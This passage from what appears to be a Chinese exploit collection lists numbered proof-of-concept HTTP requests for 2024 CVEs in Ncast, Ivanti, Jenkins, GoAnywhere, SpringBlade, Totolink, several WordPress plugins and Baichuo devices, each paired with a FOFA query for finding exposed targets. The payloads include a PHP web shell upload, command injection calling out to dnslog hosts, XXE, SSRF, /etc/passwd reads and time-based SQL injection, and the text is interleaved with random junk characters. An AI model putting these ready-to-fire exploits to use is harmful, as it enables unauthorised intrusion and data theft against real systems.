X-Requested-With: XMLHttpRequest3 [1 i9 d5 ^$ ~: Y3 U( P
3 p; _$ [0 e# B$ r. Rid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
9 t! L1 i, O/ Q, W; [% ~% }3 s1 h+ w1 @0 [. j! k
7 ? f+ H0 V3 {7 J! I3 z99. Ncast盈可视高清智能录播系统busiFacade RCE/ V B7 G, L4 O/ Y' v8 \: y
CVE-2024-03053 V* v1 W4 i: z0 ?
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
8 j9 |+ d$ B- ^9 t+ D5 ` H0 y* iPOST /classes/common/busiFacade.php HTTP/1.1) G5 f! {4 ]; H2 I" D l0 r8 S
Host: 192.168.40.130:8080; b# t3 s6 V* G4 I3 s! r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) O$ }8 H6 I, r/ a% p) M2 }. YConnection: close9 N/ m& q4 p% N* \* d) Y
Content-Length: 154& N2 q- D) N6 w& t1 d$ }# S( {
Accept: */*
; Y" T1 q. H$ e# f- hAccept-Encoding: gzip, deflate* Y Z- X0 h: e2 t) R+ B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ ?3 W. g7 K/ H# @4 Y* G6 L7 t, [
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
: z+ j+ v" d1 [/ V. }. C2 F1 jX-Requested-With: XMLHttpRequest
% E2 o& O0 Q, s) @- Y5 _! a
3 I$ ?8 j, A6 n; }+ n, o9 O%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D/ A; n( w6 q( r8 o6 Z5 _8 N
/ j" u: M# m% e! V* e( j' f) _. S: ?7 V* ?
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" V9 q6 \6 S0 P% O2 OCVE-2024-0352
. K2 U. y& K6 |. e% t6 A- ?5 ?FOFA:icon_hash="874152924"
0 u+ K. Q6 D0 MPOST /api/file/formimage HTTP/1.1" M0 x- [) W5 i# D- F& `
Host: 192.168.40.130
+ V- c) {! a9 g- iUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
' C: m# B2 ^6 C" [ l/ h8 I2 I4 ]5 ZConnection: close
. P1 I) r1 \2 _) B8 T4 n/ YContent-Length: 201
- o- L8 Y X7 b6 B$ Y5 d9 }- w" H, e% |Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
' u1 M# }) Q. w+ W9 `- i9 L4 ^9 `Accept-Encoding: gzip+ e# [( E5 ]1 X4 O0 z
/ h/ s; K# W' F7 q. l------WebKitFormBoundarygcflwtei& ]" \4 j! X. d& D1 f8 L/ K
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
; S2 f3 p7 ?( Q NContent-Type: application/x-php% W7 D6 ]- S+ Y/ l2 w9 z* ?
5 n0 |- r/ c6 B: P4 P1 {
2ayyhRXiAsKXL8olvF5s4qqyI2O$ Q, n' g9 a6 O9 h4 D
------WebKitFormBoundarygcflwtei--7 A+ a8 a& W0 h/ ~0 R" {
9 B% _9 }6 t7 d9 C5 r; P- O5 c, u3 {4 ]8 O' }8 y% Z
101. ivanti policy secure-22.6命令注入
* [6 i2 u: M3 W4 K5 B9 B+ bCVE-2024-21887# i9 l, o" Y. b8 G3 W
FOFA:body="welcome.cgi?p=logo", V! |9 t H5 V3 x9 l. u
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
1 p. K9 i% J5 i1 `8 p( ~+ HHost: x.x.x.xx.x.x.x2 f" D3 f5 O" j0 H! T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( I2 W. s w- l) s3 d& z# mConnection: close
- P9 e% {0 U' J- k, C# ^3 g& AAccept-Encoding: gzip
' y2 s( V3 x% Q2 V* ^
+ w, ? d, K& q2 C j# b" K Q9 m' m9 j& Q% Z7 k
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行# t8 v9 r; f- I/ h
CVE-2024-21893
& h- u3 K5 I2 ^FOFA:body="welcome.cgi?p=logo"
" q2 E$ @7 k2 P+ }POST /dana-ws/saml20.ws HTTP/1.1
& S% o& B- H( Z% R% Q QHost: x.x.x.x: ?+ V+ E( s/ D8 {4 {/ x# T8 y& z. O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# R# g# v# {0 w8 F) j- @Connection: close8 f4 f) z; ]5 A% t4 V7 z- f
Content-Length: 792
5 ?- E# u$ Y: a1 r# cAccept-Encoding: gzip( P; ]' k* c$ N: h
4 _ q- I/ }) Z$ \2 r<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>0 P( L$ k V, d# a
4 h. u9 t; i* k8 K; |7 z
103. Ivanti Pulse Connect Secure VPN XXE$ M3 [ ]/ J3 H1 o
CVE-2024-22024
" @; Q' {. `+ GFOFA:body="welcome.cgi?p=logo"
3 I* n1 O, C3 u( g/ K/ @POST /dana-na/auth/saml-sso.cgi HTTP/1.1
6 ?% F* z9 k' S8 x/ t9 K' bHost: 192.168.40.130:111
8 t6 f7 H* q8 u: r( xUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36& D+ M& j! T3 J5 W$ v
Connection: close
" |8 o, k$ Q+ r. ^5 |1 ?Content-Length: 204
7 y; q z8 Z+ _/ D. SContent-Type: application/x-www-form-urlencoded, x% b/ B. S/ s" `
Accept-Encoding: gzip- f3 U- ]- F: W. p' {" q
$ z) L: O; ~4 }9 x- @& W* Y
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
9 o9 u8 _$ A; L) k4 _: \) q8 k; ?1 I& k
; u% `1 ?; e5 @0 H
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下: ?8 P/ w8 ] Q% J+ o, b$ J+ |
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>" t! h3 [- L1 n ? [* O
+ ]& C! U4 ~/ C9 d5 p
, Y) i2 O- t$ @8 ^ c( ~
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露4 `' Q& I2 x7 x2 i
CVE-2024-05694 B7 i9 M3 c# z8 y
FOFA:title="TOTOLINK"( g9 Q% h. v+ L9 ?) R- i/ @
POST /cgi-bin/cstecgi.cgi HTTP/1.1: ?& k+ U. j( u
Host:192.168.0.1
" I+ R) W4 V8 Z9 h$ [+ HContent-Length:41% K6 N8 E- @" w$ C/ g
Accept:application/json,text/javascript,*/*;q=0.01
" Z, v' n! Z7 x& gX-Requested-with: XMLHttpRequest
" c2 D5 J" W( g9 CUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
; R6 w7 N$ U2 J7 rContent-Type: application/x-www-form-urlencoded:charset=UTF-8- x5 n, u# M( @- t( b0 V
Origin: http://192.168.0.1
c9 c$ u0 `! `7 H5 L9 B/ T; RReferer: http://192.168.0.1/advance/index.html?time=1671152380564
3 t: n# ?: |* q- T8 c) y) G* g8 E) CAccept-Encoding:gzip,deflate
: h% ^- y9 J. }4 D0 J% gAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7+ h, S; N& @/ j) w! W4 e; I
Connection:close/ d) g, ?" Y5 z7 i4 e; f5 s) ]3 c7 F
$ h6 m7 Q- P5 `: j7 @" |5 U3 ~: s
{/ t/ A, S$ p+ V% p% B6 B. }& ^' Q
"topicurl":"getSysStatusCfg", }# h; C# f" w0 s
"token":""8 f N3 {6 S: z& k' ^
}
: r$ k3 a& [2 M5 h- v; f" \; {+ h2 j% |' D% F' N3 m
105. SpringBlade v3.2.0 export-user SQL 注入
' O1 u: J. O4 d& ?FOFA:body="https://bladex.vip"
3 b/ x: C& k: \. g; nhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
8 s$ ~+ i N" b. l# Z% C
4 z: f% A' W6 E$ `1 t106. SpringBlade dict-biz/list SQL 注入7 j9 h7 g$ ]" I& O4 j
FOFA:body="Saber 将不能正常工作"& Z+ B% p7 Y- x! J5 S+ Z1 A) e
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
2 l6 C8 O/ a% W# s1 {Host: your-ip
# ]1 S0 B- D) S2 q% {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 a: y/ n! F, r8 cBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
2 v) t. F1 |8 L8 z' I, AAccept-Encoding: gzip, deflate
. e) E5 y6 T5 z& m; _# `+ l7 ~Accept-Language: zh-CN,zh;q=0.9, y f: ]5 Y1 n) P0 R
Connection: close
. p+ W$ x- M% o* }
6 v1 d, Y& y0 e& B
; q( A. [9 u& x5 A/ J @1 p107. SpringBlade tenant/list SQL 注入
/ L C/ \* |% b# b7 g- u) ?FOFA:body="https://bladex.vip"( t. x# V1 n/ O! P& m4 A) u
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.18 W8 q) K, p$ w P3 I! M" [2 v
Host: your-ip- `7 A' \6 g, v3 q9 O3 x2 r) {( \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( H z& Z0 \( d$ I4 H8 T! o2 h
Blade-Auth:替换为自己的2 ^: _% U7 e$ v$ o
Connection: close0 I% ^7 |* [: ~6 ^+ t0 B! x6 p
2 L3 p# o+ E2 n% [
( G% x7 Y8 n4 t9 T1 b9 g
108. D-Tale 3.9.0 SSRF5 @1 i2 }& z) n
CVE-2024-21642
/ N: U, S9 B7 Q) [; x- `7 `1 zFOFA:"dtale/static/images/favicon.png"7 f0 A3 Q8 q0 @! X+ {9 Q
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
* ^. Z; Z, I: D2 @Host: your-ip
# x1 x+ t6 l3 b z/ f, {Accept: application/json, text/plain, */*4 k% M9 @" H t! K2 Y. }( C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' P$ ? W4 z/ ~, l$ D/ {, {Accept-Encoding: gzip, deflate
& P4 G2 Y" N2 j- Q2 B4 G5 cAccept-Language: zh-CN,zh;q=0.9,en;q=0.8! y1 L' g$ Z+ n( F V
Connection: close+ N% u; \) | f
0 D* g6 d& Y2 Z0 D( K
9 |1 u1 |5 a8 r' U' I$ h109. Jenkins CLI 任意文件读取
1 f0 [1 w2 c, i F6 [CVE-2024-23897
. n+ T: ?/ @& j _; c" |9 nFOFA:header="X-Jenkins"
+ t' M) ^/ w4 U! m! L+ {POST /cli?remoting=false HTTP/1.1, G& x4 N5 ]. o! p/ Q* I
Host:; X, D! d) \ b! n" z6 Y0 ^
Content-type: application/octet-stream& l) X0 I G2 U; M
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
' W" p# E* ?8 X6 x% ~. c8 JSide: upload( ]" u t/ n+ s* W2 O
Connection: keep-alive- ~: N+ t5 N9 F& {
Content-Length: 163: K' k# v H; K% F
0 `& M7 M2 s) W
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'9 e2 K$ ]) v( B1 [+ n# V2 e4 ?
* ^4 k- e6 D; U5 Z, G5 F1 B6 P6 o' L: \5 q4 g4 b
POST /cli?remoting=false HTTP/1.1
) f" [- _+ ~$ x% D iHost:
% I6 O; X, }5 {+ S0 Z- \) d& H! nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
, I+ k7 s# ~( z. c2 a: edownload9 o( N! d% v) P9 I1 X Y
Content-Type: application/x-www-form-urlencoded
* y& ~8 J+ H' N% F4 X$ g0 x& w0 s: BContent-Length: 0
+ w. [. h! K6 J9 L8 B7 x4 {$ C$ q1 f+ q* q W8 h2 ?; U- J
1 i, N, f! n1 l; gERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin; {$ j4 x. _- O8 T
java -jar jenkins-cli.jar help- t! T6 A/ O$ p2 x
[COMMAND]- ] S0 F1 l* X. ?$ d7 o* _7 F
Lists all the available commands or a detailed description of single command.
8 i U: g+ A Q1 K COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)% c$ R) n0 a8 @+ v
5 z! _- p$ g1 y9 `; M
# g) H: u0 W( q6 m! T! ^# m
110. Goanywhere MFT 未授权创建管理员
. U: ~6 U" [6 h6 k' y& K) B' ^6 |' nCVE-2024-0204
- _- ~4 ~9 \6 t) ?FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"+ [! {5 _; Q7 E
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1 H6 Z9 ?1 v; e1 n" M& P
Host: 192.168.40.130:8000/ O4 @, g L0 {, c3 w$ l" ]- }
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
F( j; @9 Y% O" ?* u( x4 T, wConnection: close
0 e6 R+ r% n# I9 y' DAccept: */*" S2 Y6 O7 B' I
Accept-Language: en
1 F7 }. _# ^6 g7 E# [5 IAccept-Encoding: gzip0 {# Q8 M8 j& G4 y: {2 w
1 o& b; E, r9 ~0 V, m9 ]
2 @1 t4 H! p) P% \7 N111. WordPress Plugin HTML5 Video Player SQL注入
$ C o; R" l' A5 iCVE-2024-1061& D# a; `: m3 ]: ~ C, z1 ^
FOFA:"wordpress" && body="html5-video-player"
- J. D, Q- _/ n& U4 _# V, UGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
$ t& F1 f& N4 _& mHost: 192.168.40.130:112
, B6 e/ n a3 X7 v9 `: v' B3 Y ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ ?0 x9 y1 _) Y2 T# V! ]5 m
Connection: close
1 Q: n7 I3 }) I" G: {% k1 |Accept: */*6 a/ q q6 e1 E! w# x7 H4 P( J. W1 V
Accept-Language: en/ D5 N D; y1 o# J
Accept-Encoding: gzip
* ]' c' n+ g5 f3 K; h' g" Q& p3 Z3 H9 l8 @+ [, M
7 N }! |) ^; `. h8 m0 K3 g6 ^% {5 @
112. WordPress Plugin NotificationX SQL 注入4 `; i' z, a4 o2 W+ P
CVE-2024-1698/ G7 o0 i8 X* @; c% ~) d: C& [
FOFA:body="/wp-content/plugins/notificationx"8 |2 z" `: Z7 l& G, k O
POST /wp-json/notificationx/v1/analytics HTTP/1.1: R( Y& a7 f. R" l
Host: {{Hostname}}
# y, e/ d/ m) i7 j8 M1 GContent-Type: application/json0 s! W P3 T0 y! a, |2 N' _
. |2 l2 M' j. e: y6 {9 Z$ S4 ~{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
' X8 j- P4 O/ e/ B: R4 L/ R# h7 h+ @$ T: M0 {; ?
$ v1 J3 X5 B0 n8 y R113. WordPress Automatic 插件任意文件下载和SSRF4 N0 c% r' S; E# E# {* X
CVE-2024-27954
. T: v7 l: A1 {8 {2 S+ K- ?' j' ^FOFA:"/wp-content/plugins/wp-automatic"5 |) ~- k) \- v
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
' e% Q; r; f0 q' S3 [7 sHost: x.x.x.x% u- E# [. Q% h: z$ t6 C* a7 C2 p
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
- r; N1 f- k, o4 K0 iConnection: close A, h$ _: d! i! h4 H
Accept: */*
' q: H7 m& ^4 YAccept-Language: en+ D5 K+ A$ k: d4 R( L
Accept-Encoding: gzip" j' [7 H- F! n# l$ c6 G2 o0 I
1 l+ P3 ]6 \4 @$ b5 C2 e/ F9 U
' t$ W$ c+ k1 P5 t5 z% ~- s* ~8 X114. WordPress MasterStudy LMS插件 SQL注入 u/ y3 c! `4 n1 M0 P" Y' F+ w
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"4 ~3 m; X, b% ]; g
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
4 ?/ ^, p3 P# D' |* OHost: your-ip
& ]5 a% N$ b0 p* {) U- Y7 B+ b3 Q$ `9 |User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; X+ }% J) e% i3 J5 i( J3 l
Accept-Charset: utf-8
& `; b' e! d, DAccept-Encoding: gzip, deflate% l* q4 j7 D: ]2 w( L
Connection: close2 ]0 M7 X0 t- T! L6 J3 y
* T3 s* x4 L0 w0 J; F+ [$ a H% P' q/ L* t8 P d- v
115. WordPress Bricks Builder <= 1.9.6 RCE
; x; k5 u- W8 nCVE-2024-25600$ {' ]8 V N8 y1 e
FOFA: body="/wp-content/themes/bricks/", ^/ C) N* [1 P1 W( \2 Z
第一步,获取网站的nonce值& j, ^# |! x" @7 Q* I' g4 [
GET / HTTP/1.10 p% I" `$ v0 W
Host: x.x.x.x9 ?$ t1 m7 Z1 D( F$ X# \/ s
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( ~' b$ | y4 \2 {0 E. `* ~
Connection: close
1 S7 p0 S: d Y; b0 cAccept-Encoding: gzip
9 V: Q+ E3 v( k! k
" z9 F3 }8 O2 p. q' S/ H
# {2 W5 q" q: O' _6 ?5 |) j第二步替换nonce值,执行命令, \3 P! D1 J6 h/ i A& E, X
POST /wp-json/bricks/v1/render_element HTTP/1.1
& u2 O' \& E8 j3 R0 D1 pHost: x.x.x.x
5 u; L, E2 l3 F6 W: k y# G/ P: x% QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 o9 m2 p* G0 q* T Y, a. g: K- _: ^
Connection: close
/ b( P$ F0 s2 vContent-Length: 356
3 R9 Y; h& v: s" {4 H. RContent-Type: application/json. O3 P2 |2 w8 T& [7 E: e
Accept-Encoding: gzip
. K6 o! X, k# c. u8 [! ~
) U. P2 ~0 _2 L/ r1 H: \4 T{/ u" m& d5 L: x/ n- D: E
"postId": "1",
" n& F2 L. a" a2 H$ M "nonce": "第一步获得的值",
7 @' G6 h- ^! w6 R" W& ` "element": {
2 C7 U; N) z! t "name": "container",
; m- W- E( F) C "settings": {
7 z: A. H( u1 L i7 _7 e3 { "hasLoop": "true",
2 r; H+ h8 E1 s" S3 c( n "query": {, E* U. ?4 }% q5 V g
"useQueryEditor": true,0 u+ t" p/ ]4 c/ v& @; C
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
8 s7 X% M' M; Y( G "objectType": "post", Q' W( O* E% K+ D$ n) q" \6 w
}+ G7 l$ Y4 q+ P, g7 G: u
}3 w' Y4 F2 p3 J0 W
}
8 F' {& q p. l2 C1 x! V" V% w}
8 B2 ]) s4 a. J" Y0 @
0 t7 `" @% Z" V+ o) j2 R' F" P2 ?7 \& U5 ~# r7 T/ q1 B6 A
116. wordpress js-support-ticket文件上传4 v; Y2 d+ p0 W9 E
FOFA:body="wp-content/plugins/js-support-ticket"" @3 z9 b0 u8 O0 R& j# Q
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
9 f) ?. ~& d$ J- Y5 `Host:
- x) t. n5 P7 d! y6 E) M$ gContent-Type: multipart/form-data; boundary=--------767099171
( r. E" T* Y) c- G% J: sUser-Agent: Mozilla/5.0% o8 d0 g: [0 }% B
0 v( y4 T0 ?0 W- q, `9 V
----------767099171& J! u1 m0 b, X1 J
Content-Disposition: form-data; name="action") W/ t8 Z1 V+ F# }
configuration_saveconfiguration
i- E! j) Q, y1 T----------767099171
4 }3 b# q. p. q2 H5 Y g. F( zContent-Disposition: form-data; name="form_request"4 G; J5 g0 P3 R# B/ J- A) V% Q1 w' o
jssupportticket
4 F1 s5 Q n( \; V5 @1 V) Z----------767099171+ E A4 q1 s! G; c: j2 S
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"# h( r* j( L( T, E1 ~
Content-Type: image/png
. T2 v+ m9 s8 T----------767099171--
- u' A7 Z+ I4 \. F3 h: Y5 |& r$ x. F1 F+ E
4 ]0 ~! d4 D9 I. z8 e117. WordPress LayerSlider插件SQL注入* E6 R0 L0 i3 j$ ] X
version:7.9.11 – 7.10.03 M' v" t: y, h# n! Y/ F
FOFA:body="/wp-content/plugins/LayerSlider/"
% Z7 [/ }3 ]; L7 P1 @% X4 ?GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1# Q" o% o" w$ C" M* J+ \# K
Host: your-ip
# D( d# x, d, z# V, vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 f( ^2 I7 I! U* m+ V4 o5 w% v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! f3 ~/ c6 C2 u. |: i7 p0 B& y2 I" HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 `2 L9 ~& R8 O% b
Accept-Encoding: gzip, deflate, br3 u8 \7 c) [ e# ?+ Y
Connection: close4 F/ d, e" ]' s# o$ t9 N
Upgrade-Insecure-Requests: 1; x1 L4 G; } { O; h" p7 x
( U, F$ ^5 q: C j$ @ g- J* z; h. f/ O6 ]/ ~ x: G
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ W4 g7 g$ |9 y1 p$ W( S8 P0 ?CVE-2024-0939
+ z) D) i/ ~ u% M) UFOFA:title="Smart管理平台"
4 ~' ^, `3 V0 ~/ E: q& z! oPOST /Tool/uploadfile.php? HTTP/1.1
5 S9 A$ E7 v9 b) E! _3 o6 j7 _! bHost: 192.168.40.130:8443# l# O4 s* u, L; K/ s
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8: Z* L ~0 S. z! h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0; d' w4 z) l F7 a' i& Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; ?8 Q a; O0 N/ K* v6 d" q; p' CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# M+ t: }! z: s+ _2 h# R4 I
Accept-Encoding: gzip, deflate
( B( m1 c g8 L% e; M9 M: R$ r& @Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887+ d8 H; J+ g. I
Content-Length: 405" \/ ~3 d: P. @; r/ d& x
Origin: https://192.168.40.130:8443
- X5 Y8 z, q# {$ i& U5 b, aReferer: https://192.168.40.130:8443/Tool/uploadfile.php' D' M+ t o Z! `
Upgrade-Insecure-Requests: 1
% }6 t, U' d, @Sec-Fetch-Dest: document
5 d \9 h; l( e6 y Y# eSec-Fetch-Mode: navigate0 v' _8 M' W8 a5 l& N* g# p
Sec-Fetch-Site: same-origin3 ~' b1 C& U: |
Sec-Fetch-User: ?1
/ p* r; u' h+ J3 C* `2 yTe: trailers2 ^) }% _# x8 i& I1 e" f
Connection: close
/ y/ ~) N# G( X- X& R9 v3 y4 X% V0 {
-----------------------------13979701222747646634037182887
8 Q7 G: `* U( I% g0 W* MContent-Disposition: form-data; name="file_upload"; filename="contents.php"
. G2 g* s& d6 ]$ U& E! H. |: cContent-Type: application/octet-stream9 F, M( S/ }8 d5 D) j" O* J, m
; r8 l5 ?8 J! W
<?php4 y+ ^; g( C3 `& v3 P$ t1 Z. F
system($_POST["passwd"]);. p) r1 d, ~9 C& ~9 a
?>
8 A3 z" e* K |( H+ u( C4 E( Q-----------------------------139797012227476466340371828871 G4 h4 g* Y5 P; c/ S7 N* w
Content-Disposition: form-data; name="txt_path"
7 k3 s: m. u+ U8 L+ X: Q- [# @4 y4 ~! @/ P7 J" S
/home/src.php- d# A9 |; S* z! ?2 P$ V
-----------------------------13979701222747646634037182887--" K) M5 u, w) F* V0 n1 P- q
, w: F; V7 J& c7 R
2 l5 K$ E4 t% m/ M! E访问/home/src.php7 s) D( P& ~1 D4 j0 z7 l
2 R4 j, I3 E+ V: e! I, w119. 北京百绰智能S20后台sysmanageajax.php sql注入
& g' {4 L! i& s2 J! _7 R. ^CVE-2024-1254
/ D, R {/ i4 rFOFA:title="Smart管理平台"
, V4 T7 {- L: l% }! X/ q先登录进入系统,默认账号密码为admin/admin
; G4 l& R/ S/ b e+ i0 k1 ^, {POST /sysmanage/sysmanageajax.php HTTP/1.11
; b8 }: I3 u4 r% F" H, ^9 lHost: x.x.x.x! D# q0 j9 u" X* B- ~0 ?% ]
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee: ]0 h9 ]; T% U5 T0 P8 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.05 @# J0 s7 a; M3 L: M0 v
Accept: */*
; [& Z: V5 y7 e! t7 I; yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* L, \5 C \7 P" H- WAccept-Encoding: gzip, deflate
4 i- y9 D, N; G! T6 `Content-Type: application/x-www-form-urlencoded;( C: v- c- x7 u
Content-Length: 109
3 t7 `5 {, s% D8 [+ oOrigin: https://58.18.133.60:8443
~% Q$ X! @7 q5 B: D% N" rReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
, y- m- b; b0 V' X5 x/ cSec-Fetch-Dest: empty& n+ E9 g7 m( `
Sec-Fetch-Mode: cors7 u3 Y( `, d4 x7 D9 j
Sec-Fetch-Site: same-origin
5 i$ P2 {$ [, k5 n5 k2 O: b1 K) pX-Forwarded-For: 1.1.1.12 c9 H5 C' \2 o3 N% I
